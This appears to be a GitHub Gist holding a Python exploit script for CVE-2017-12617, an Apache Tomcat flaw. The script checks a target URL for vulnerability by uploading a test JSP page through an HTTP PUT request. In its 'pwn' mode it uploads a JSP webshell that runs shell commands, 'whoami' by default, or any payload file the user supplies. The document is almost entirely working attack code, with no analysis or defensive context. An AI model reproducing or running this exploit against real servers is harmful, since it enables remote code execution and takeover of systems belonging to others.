Created
December 10, 2019 02:46
-
-
Save frankli0324/7b29b30162eb6f11964d19c85944fc15 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import os | |
from argparse import ArgumentParser, FileType | |
banner = """ | |
CVE-2017-12617 | |
Frank | |
""".lstrip('\n') | |
pin = '<% out.println("content");%>' | |
payload = """ | |
<%@ page import="java.io.*" %> | |
<% | |
String output = ""; | |
String s = null; | |
try { | |
Process p = Runtime.getRuntime().exec(new String[]{ | |
"bash", "-c", "whoami" | |
}); | |
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); | |
while((s = sI.readLine()) != null) { output += s+"\\n"; } | |
} catch(IOException e) { e.printStackTrace(); } | |
%> | |
<pre><%=output %></pre>""" | |
def upload_payload(url, payload): | |
try: | |
url = url.rstrip('/')+'/' | |
return requests.put( | |
url, data=payload.encode('utf-8') | |
).status_code == 201 | |
except: | |
print('unable to reach target: ', url) | |
return False | |
if __name__ == '__main__': | |
parse = ArgumentParser() | |
parse.add_argument("-u", "--url", dest="target", type=str, | |
help="set target url", required=True) | |
parse.add_argument("-p", "--pwn", dest="pwn", action='store_true', | |
help="generate webshell and upload it") | |
parse.add_argument("-f", "--file", dest="file", type=FileType('r')) | |
opt = parse.parse_args() | |
if opt.target != None: | |
target = opt.target.lstrip('/')+'/upload.jsp/' | |
print(banner) | |
if opt.target == None and opt.pwn == None: | |
print(parse.usage) | |
exit(0) | |
elif opt.target != None and opt.pwn == None: | |
if upload_payload(target, pin) \ | |
and 'content' in requests.get(target).text: | |
print('Target is Vulnerable to CVE-2017-12617') | |
else: | |
print('Not Vulnerable to CVE-2017-12617 ') | |
elif opt.pwn != None and opt.target != None: | |
if opt.file != None: | |
try: | |
payload = opt.file.read() | |
print('Using', opt.file.name, 'as payload') | |
except: | |
pass | |
print("Uploading File .....") | |
upload_payload(target, payload) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment